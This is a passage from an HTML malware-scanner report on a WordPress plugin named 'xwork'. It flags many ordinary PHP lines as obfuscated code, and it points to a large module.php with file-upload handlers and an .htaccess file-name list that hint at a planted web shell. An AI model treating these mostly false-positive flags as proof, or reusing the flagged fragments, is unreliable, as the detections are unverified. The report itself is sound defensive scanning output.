</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The name of the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">Xwork_Loader Orchestrates the hooks of the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The version number of the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 214</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions used across both the</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_532").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/includes/class-xwork-deactivator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 578.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_533" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_533").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/includes/class-xwork-activator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 568.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_534" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_534").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/xwork.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_535" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run_xwork</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">= new </span><span style="color: #0000BB">Xwork</span><span style="color: #007700">(); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } </span><span style="color: #0000BB">run_xwork</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_xwork</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_xwork</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 76</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run_xwork</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, and </span><span style="color: #0000BB">defines a </span><span style="color: #007700">function</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_535").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/admin/.htaccess</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-26 08:42:48</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_536" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">comdofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">connects</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">copypaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">delpaths</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">doiconvs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">epinyins</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">filefuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">gdftps</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">hplfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">memberfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">moddofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">onclickfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">phpzipincs</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qfunctions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">qinfofuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">schallfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">tempfuns</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #007700">|</span><span style="color: #0000BB">userfu</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_536").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/admin/class-xwork-admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.40 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_537" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">wp_enqueue_script</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'js/xwork-admin.js'</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality of the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is provided </span><span style="color: #007700">for </span><span style="color: #0000BB">demonstration purposes only</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions defined in this</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_537").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/public/class-xwork-public.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.44 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_538" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">wp_enqueue_script</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'js/xwork-public.js'</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functionality of the plugin</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">( </span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_styles</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is provided </span><span style="color: #007700">for </span><span style="color: #0000BB">demonstration purposes only</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions defined in this</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">enqueue_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_538").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/xwork/module.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.69 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-21 10:13:50</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 27</span><br><table id="file_539" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { var </span><span style="color: #0000BB">itemName </span><span style="color: #007700">= $(</span><span style="color: #0000BB">this</span><span style="color: #007700">).</span><span style="color: #0000BB">data</span><span style="color: #007700">(</span><span style="color: #DD0000">'item'</span><span style="color: #007700">); $(</span><span style="color: #DD0000">'#din'</span><span style="color: #007700">).</span><span style="color: #0000BB">text</span><span style="color: #007700">(</span><span style="color: #0000BB">itemName</span><span style="color: #007700">); $(</span><span style="color: #DD0000">'#dip'</span><span style="color: #007700">).</span><span style="color: #0000BB">val</span><span style="color: #007700">(</span><span style="color: #0000BB">itemName</span><span style="color: #007700">); $(</span><span style="color: #DD0000">'#md'</span><span style="color: #007700">).</span><span style="color: #0000BB">modal</span><span style="color: #007700">(</span><span style="color: #DD0000">'show'</span><span style="color: #007700">); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'ups'</span><span style="color: #007700">).</span><span style="color: #0000BB">addEventListener</span><span style="color: #007700">(</span><span style="color: #DD0000">'change'</span><span style="color: #007700">, function() { var </span><span style="color: #0000BB">label </span><span style="color: #007700">= </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'uputama'</span><span style="color: #007700">); if (</span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">files</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1000</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get</span><span style="color: #007700">(</span><span style="color: #0000BB">pesan</span><span style="color: #007700">, </span><span style="color: #0000BB">warna</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$iall</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sall</span><span style="color: #007700">(</span><span style="color: #0000BB">$item</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
